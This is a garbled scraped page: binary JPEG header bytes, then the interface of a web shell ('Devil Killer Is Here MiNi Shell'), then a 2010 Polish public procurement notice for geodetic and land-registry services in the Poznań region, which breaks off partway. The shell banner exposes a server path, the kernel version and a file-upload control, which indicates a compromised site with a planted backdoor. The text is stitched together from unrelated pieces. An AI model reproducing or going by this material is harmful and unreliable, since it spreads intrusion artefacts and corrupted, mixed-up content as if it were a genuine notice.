JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100729/203021-N-2010.html

<p class="kh_header"><b>Poznań: Usługi geodezyjne - numer postępowania 0160/POZ/48/2010</b><br>
<b>Numer ogłoszenia: 203021 - 2010; data zamieszczenia: 29.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy , ul. Fredry 12, 61-701 Poznań, woj. wielkopolskie, tel. 061 8560681, faks 061 8515092.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi geodezyjne - numer postępowania 0160/POZ/48/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I: Przeprowadzenie podziału działki nr 263 oraz wykonanie operatu szacunkowego  z ustalenia wartości rynkowej dla nowo wydzielonej części nieruchomości  zabudowanej położonej w obrębie Tomice gmina Stęszew.

Część II: Badanie stanu prawnego działek położonych w obrębie Jaryszewo gmina Obrzycko.

Część III: Wykonanie wyciągu z wykazu zmian gruntowych wraz z przeprowadzeniem badania stanu prawnego KW prowadzonych przez Sąd Rejonowy w Kościanie.

Część IV: Wykonanie wyciągu z wykazu zmian gruntowych w celu uregulowania działu I KW Nr PO1Y/00022720/3 prowadzonej przez SR w Gostyniu.

Część V: Sporządzenie wyciągu z wykazu zmian gruntowych oraz przeprowadzenie badania stanu prawnego dla nieruchomości objętych KW Nr PO1L/00007548/2 prowadzoną przez SR w Lesznie.

Część VI: Przeprowadzenie badania stanu prawnego KW i sporządzenie protokołu  z tego badania dotyczącego działek położonych w obrębie Boruja Kościelna oraz Boruja Nowa gmina Nowy Tomyśl.

Część VII: Wykonanie wyciągu z wykazu zmian gruntowych w celu uregulowania działu I KW Nr 15988 prowadzonej przez SR w Gostyniu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia: 
1.1. Dysponuje geodetami posiadającymi świadectwo nadania uprawnień zawodowych w zakresie geodezji i kartografii, wydane zgodnie z przepisami Ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (Dz. U. nr 240 poz. 2027 z  2005r.).
1.2. Dysponuje rzeczoznawcami majątkowymi posiadającymi uprawnienia w zakresie szacowania nieruchomości, czyli posiadającymi świadectwo nadania uprawnień rzeczoznawcy majątkowego wydane zgodnie z przepisami Ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami dotyczy części I. 
Dokonanie oceny spełniania warunków polegać będzie na sprawdzeniu przez Zamawiającego, czy na podstawie dostarczonych przez Wykonawcę dokumentów i oświadczeń można dopuścić go do postępowania o udzielenie zamówienia, według formuły (spełnia - nie spełnia). Niespełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy z postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na potwierdzenie tego, że Wykonawca spełnia warunki określone w Cześci VII pkt. I SIWZ, Wykonawca zobowiązany jest złożyć oprócz dokumentów wskazanych powyżej pisemne oświadczenie o spełnianiu tych warunków. Odpowiednie oświadczenie znajduje się w Formularzu oferty, który stanowi załącznik nr 1 do SIWZ. Podpisanie formularza oferty równoznaczne jest ze złożeniem oświadczenia o spełnianiu wyżej wspomnianych warunków.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 2.2 (część VIII SIWZ), Wykonawca: składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce  zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości
Dokument o którym mowa w punkcie 4. ppkt. a) powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Dokument należy złożyć w oryginale lub w potwierdzonej za zgodność z oryginałem kserokopii, pod warunkiem, że takie kserokopie zostaną podpisane za zgodność z oryginałem przez Wykonawcę.
Zamawiający zażąda przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów wymaganych w części VIII SIWZ lub którzy złożyli dokumenty zawierające błędy, zamawiający wezwie do ich uzupełnienia wyznaczając termin, chyba, że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej okoliczności wymienionej poniżej:
1. Zmiana terminu realizacji przedmiotu umowy:
1.1. Zmiany spowodowane warunkami atmosferycznymi
a) klęski żywiołowe
b) udokumentowane warunki atmosferyczne uniemożliwiające przeprowadzenie czynności związanych z wykonywaną sługą.
1.2. Zmiany będące następstwem konieczności wprowadzenia zmian w zakresie usługi z przyczyn nie wynikających ze strony Wykonawcy.
1.3. Zmiany będące następstwem działania organów administracji a w szczególności:
a) przekroczenie określonych przez prawo terminów wydawania przez osoby trzecie wypisów, wyrysów, opinii decyzji, zaświadczeń itp. skutkujące niemożliwością wykonania zamówienia
b) wstrzymanie realizacji przedmiotu umowy jako następstwo działania osób trzecich
1.4. Zmiany spowodowane działaniem lub brakiem działania osób a uniemożliwiające przeprowadzenie czynności związanych z wykonywaną sługą.
1.5. siła wyższa uniemożliwiającą wykonanie przedmiotu umowy zgodnie z SIWZ lub treścią umowy
2. Pozostałe zmiany
a) zmiana danych stron umowy związanych z obsługą administracyjno-organizacyjną umowy np. zmiana adresu
3. W przypadku wystąpienia którejkolwiek okoliczności wymienionych w pkt. 1 termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonania jej przedmiotu w sposób należyty. Ciężar udowodnienia faktu w takim układzie spoczywa na wykonawcy przedmiotowego zamówienia.
4. W przypadku wystąpienia okoliczności wymienionej w pkt. 2 strony niezwłocznie powiadomią się wzajemnie pisemnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych ul. Fredry 12, 61-701 Poznań pok. 417.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2010 godzina 08:00, miejsce: Agencja Nieruchomości Rolnych ul. Fredry 12, 61-701 Poznań pok. 215.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie podziału działki nr 263 oraz wykonanie operatu szacunkowego  z ustalenia wartości rynkowej dla nowo wydzielonej części nieruchomości  zabudowanej położonej w obrębie Tomice gmina Stęszew..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1/ Przeprowadzenie podziału działki oznaczonej w ewidencji gruntów  nr 263 w sposób wskazany przez tut. Oddział, polegający na wydzieleniu nieruchomości zabudowanej o ok. 0,2634 ha z działki o pow. 1,9650 ha po uprzednim zaakceptowaniu projektu podziału przez tut. Oddział. Szkic działki stanowi załącznik nr 7A do SIWZ.
2/ Wykonanie operatu szacunkowego z ustalenia wartości rynkowej dla nowo wydzielonej części nieruchomości zabudowanej położonej w obrębie Tomice gmina Stęszew oznaczonej w ewidencji gruntów nr 263 o pow. ~ 0,2634 ha mając na uwadze położenie i zapisy w studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Stęszew - łąki i pastwiska/otulina WPN/obszar Natura 2000. Rzeczoznawca winien wyodrębnić: a/ wartość budynków i budowli b/ wartość gruntu.
Sprzedaż nastąpi w trybie bezprzetargowym na rzecz dzierżawcy.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Jadwiga Staszak tel. 61/8560627..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Badanie stanu prawnego działek położonych w obrębie Jaryszewo gmina Obrzycko..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a/ Przeprowadzenie badania stanu prawnego dot. działek położonych w gminie Obrzycko, w obrębie Jaryszewo /wieś Brączewo/ oznaczonych w ewidencji gruntów nr 31 o pow. 0,24 ha, nr 32 o pow. 0,0900 ha, nr 213/1 o pow. 24,06 ha, nr 215 o pow. 26,1500 ha, nr 234 o pow. 1,06 ha, nr 338 o pow. 8,8700 ha, nr 339 o pow. 13,5400 ha, nr 341 o pow. 59,69 ha polegającego na ustaleniu nazwiska byłych właścicieli od 1945 roku wraz z ewentualną parcelacją oraz podanie podstawy prawnej przejęcia w/w nieruchomości na Skarb Państwa, a także dostarczenie do tut. Oddziału /z uwagi na brak KW/ wypisów i wyrysów z ujawnionymi nr KW oraz wyciągu z wykazu zmian gruntowych z ujawnioną nową powierzchni~ niezbędną do zawarcia umowy sprzedaży. 
b/ Przeprowadzenie badania stanu prawnego dot. pozostałych działek objętych wnioskiem dzierżawcy, położonych w gminie Obrzycko, w obrębie Jaryszewo /wieś Brączewo/ oznaczonych w ewidencji gruntów nr 213/5 o pow. 16,3188 ha, nr 236/8 o pow. 5,0199 ha, nr 337/28 o pow. 27055 ha, nr 340/1 o pow. 20,1376 ha polegającego na ustaleniu nazwiska byłych właścicieli od 1945 roku wraz z ewentualną parcelacją oraz podanie podstawy prawnej przejęcia w/w nieruchomości na Skarb Państwa, 
c/ Przeprowadzenie podziału działki oznaczonej w ewidencji gruntów nr 236/8, w sposób wskazany przez tut. Oddział, z uwagi na funkcję w Studium uwarunkowań i kierunków zagospodarowania przestrzennego i możliwość uzyskania warunków zabudowy na część w/w działki, 
d/ Rozgraniczenie nieruchomości w celu ustalenia punktów granicznych i przebiegu linii granicznych działki o nr 341 - sąsiadującej bezpośrednio z rzeką Wartą. 
Sprzedaż nastąpi w trybie bezprzetagowym na rzecz dzierżawcy. 
Osoba do kontaktu w sprawie przedmiotu zamówienia: Jadwiga Staszak tel. 61/8560627.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie wyciągu z wykazu zmian gruntowych wraz z przeprowadzeniem badania stanu prawnego KW prowadzonych przez Sąd Rejonowy w Kościanie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Sporządzenie wyciągu z wykazu zmian gruntowych dla nieruchomości znajdujących się w Księdze Wieczystej nr 10366, potwierdzonego przez Starostwo Powiatowe w Kościanie, w celu sporządzenia wniosku do Sądu Rejonowego o uregulowanie działu I Księgi Wieczystej.
b) Sporządzenie protokółu badania wszystkich działek objętych wyciągiem z wykazu zmian gruntowych i zapisanych w Księdze Wieczystej nr 10336 prowadzonej przez Sąd Rejonowy w Kościanie, poprzez ustalenie nazwisk wszystkich właścicieli przed Skarbem Państwa, ustalenie nazwiska właściciela majątku, z którego nastąpiła ewentualna parcelacja po II wojnie światowej (w przypadku gdy miała ona miejsce, to na kogo i w jakiej części), ustalenie podstawy prawnej przejęcia nieruchomości na Skarb Państwa od okresu powojennego do dnia przejęcia na Skarb Państwa.
c) Sporządzenie wyciągu z wykazu zmian gruntowych dla nieruchomości znajdujących się w Księdze Wieczystej nr 795, potwierdzonego przez Starostwo Powiatowe w Kościanie, w celu sporządzenia wniosku do Sądu Rejonowego o uregulowanie działu I Księgi Wieczystej.
d) Sporządzenie protokółu badania wszystkich działek objętych wyciągiem z wykazu zmian gruntowych i zapisanych w Księdze Wieczystej nr 795 prowadzonej przez Sąd Rejonowy w Kościanie, poprzez ustalenie nazwisk wszystkich właścicieli przed Skarbem Państwa, ustalenie nazwiska właściciela majątku, z którego nastąpiła ewentualna parcelacja po II wojnie światowej (w przypadku gdy miała ona miejsce, to na kogo i w jakiej części), ustalenie podstawy prawnej przejęcia nieruchomości na Skarb Państwa od okresu powojennego do dnia przejęcia na Skarb Państwa.
e) Sporządzenie wyciągu z wykazu zmian gruntowych dla nieruchomości znajdujących się w Księdze Wieczystej nr 3621, potwierdzonego przez Starostwo Powiatowe w Kościanie, w celu sporządzenia wniosku do Sądu Rejonowego o uregulowanie działu I Księgi Wieczystej.
f) Sporządzenie protokółu badania wszystkich działek objętych wyciągiem z wykazu zmian gruntowych i zapisanych w Księdze Wieczystej nr 3621 prowadzonej przez Sąd Rejonowy w Kościanie, poprzez ustalenie nazwisk wszystkich właścicieli przed Skarbem Państwa, ustalenie nazwiska właściciela majątku, z którego nastąpiła ewentualna parcelacja po II wojnie światowej (w przypadku gdy miała ona miejsce, to na kogo i w jakiej części), ustalenie podstawy prawnej przejęcia nieruchomości na Skarb Państwa od okresu powojennego do dnia przejęcia na Skarb Państwa.
g) Sporządzenie wyciągu z wykazu zmian gruntowych dla nieruchomości znajdujących się w Księdze Wieczystej nr 793 potwierdzonego przez Starostwo Powiatowe w Kościanie, w celu sporządzenia wniosku do Sądu Rejonowego o uregulowanie działu I Księgi Wieczystej.
h) Sporządzenie protokółu badania wszystkich działek objętych wyciągiem z wykazu zmian gruntowych i zapisanych w Księdze Wieczystej nr 793 prowadzonej przez Sąd Rejonowy w Kościanie, poprzez ustalenie nazwisk wszystkich właścicieli przed Skarbem Państwa, ustalenie nazwiska właściciela majątku, z którego nastąpiła ewentualna parcelacja po II wojnie światowej (w przypadku gdy miała ona miejsce, to na kogo i w jakiej części), ustalenie podstawy prawnej przejęcia nieruchomości na Skarb Państwa od okresu powojennego do dnia przejęcia na Skarb Państwa.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Sławomir Bosy tel. 65/5185564..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie wyciągu z wykazu zmian gruntowych w celu uregulowania działu I KW Nr PO1Y/00022720/3 prowadzonej przez SR w Gostyniu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie wyciągu z wykazu zmian gruntowych w celu uregulowania działu I Księgi Wieczystej nr PO1Y/00022720/3 prowadzonej przez Sąd Rejonowy w Gostyniu.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Sławomir Bosy tel. 65/5185564..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sporządzenie wyciągu z wykazu zmian gruntowych oraz przeprowadzenie badania stanu prawnego dla nieruchomości objętych KW Nr PO1L/00007548/2 prowadzoną przez SR w Lesznie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Sporządzenie i dostarczenie Zamawiającemu  wyciągu  z wykazu zmian gruntowych  dla nieruchomości znajdujących  się w   księdze  wieczystej, potwierdzony  przez Starostwo  Powiatowe w Lesznie, w celu  sporządzenia wniosku  do Sądu Rejonowego w Lesznie o uregulowanie  działu I   Księga wieczysta  KW nr  PO1L/00007548/2; 
b) Sporządzenie protokółu badania  wszystkich działek  objętych wyciągiem z wykazu zmian gruntowych i zapisanych w  księdze wieczystej  prowadzonych w Sądzie Rejonowym  w Lesznie: Księga wieczysta KW  nr  PO1L/00007548/2;  poprzez ustalenie nazwisk wszystkich właścicieli przed Skarbem Państwa, ustalenie nazwiska właściciela majątku, z którego nastąpiła ewentualna parcelacja po II wojnie światowej ( w przypadku gdy miała ona miejsce to na kogo i w jakiej części ), podanie podstawy prawnej przejęcia  nieruchomości na Skarb Państwa od okresu powojennego do dnia przejęcia na Skarb Państwa.
c) Uzyskanie aktualnego wypisu z rejestru gruntów dla badanych działek z podaniem nr księgi wieczystej.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Teresa Ciszak tel. 65/5185564..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przeprowadzenie badania stanu prawnego KW i sporządzenie protokołu  z tego badania dotyczącego działek położonych w obrębie Boruja Kościelna oraz Boruja Nowa gmina Nowy Tomyśl..</p>
